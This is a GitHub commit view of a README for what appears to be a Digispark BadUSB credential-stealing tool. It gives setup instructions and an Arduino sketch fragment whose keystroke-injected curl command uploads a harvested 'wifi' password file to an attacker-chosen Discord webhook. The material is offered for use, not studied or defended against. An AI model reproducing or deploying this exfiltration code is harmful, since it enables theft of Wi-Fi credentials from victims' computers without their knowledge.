Update README.md

This commit is contained in:
Ashfaque Khan 2022-10-12 22:02:36 +05:30 committed by GitHub
parent 2489b09f9d
commit 8b2005f612
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 42 additions and 43 deletions

View File

@ -20,12 +20,12 @@
change the "FILENAME" to anyname you want your folder to be.
Also Edit the line number 16 in the Arduino code and insert the following details (* most important Webhook url)
'''
DigiKeyboard.println("curl -i -H \"Expect:application/json\" -F file=@wifi -F \"payload_json={\\\"wait\\\":true,\\\"content\\\":\\\"ANYCOMMENT\\\",\\\"ANYNAME\\\":\\\"passwords\\\"}\" WEBHOOK_URL"); //curl command which is used to send the passwords to your discord channel/server (**Change replace "WEBHOOK_URL" with your discord's webhook url of any channel.
'''
#### Example:
'''
#include "DigiKeyboard.h"
void setup() {
pinMode(1, OUTPUT); //LED on Model A
@ -47,7 +47,6 @@
digitalWrite(1, HIGH); //led on
DigiKeyboard.delay(90000);
}
'''
### Your are all set to upload the code.